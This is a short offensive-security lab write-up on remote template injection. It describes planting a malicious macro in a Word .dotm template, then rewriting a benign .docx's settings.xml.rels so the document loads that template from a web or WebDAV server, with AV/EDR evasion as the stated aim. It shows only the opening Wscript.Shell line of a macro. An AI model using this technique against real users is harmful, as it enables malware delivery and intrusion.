This lab shows how it is possible to add a macros payload to a docx file indirectly, which has a good chance of evading some AVs/EDRs.
This technique works in the following way:
A malicious macro is saved in a Word template .dotm file
Benign .docx file is created based on one of the default MS Word Document templates
Document from step 2 is saved as .docx
Document from step 3 is renamed to .zip
Document from step 4 gets unzipped
.\word_rels\settings.xml.rels contains a reference to the template file. That reference gets replaced with a refernce to our malicious macro created in step 1. File can be hosted on a web server (http) or webdav (smb).
File gets zipped back up again and renamed to .docx
Alt+F8 to enter Dev mode where we can edit Macros, select ThisDocument and paste in:
Set objShell =CreateObject("Wscript.Shell")
Create a benign .docx file based on one of the provided templates and save it as .docx:
Rename legit.docx to legit.zip:
Unzip the archive and edit word_rels\settings.xml.rels: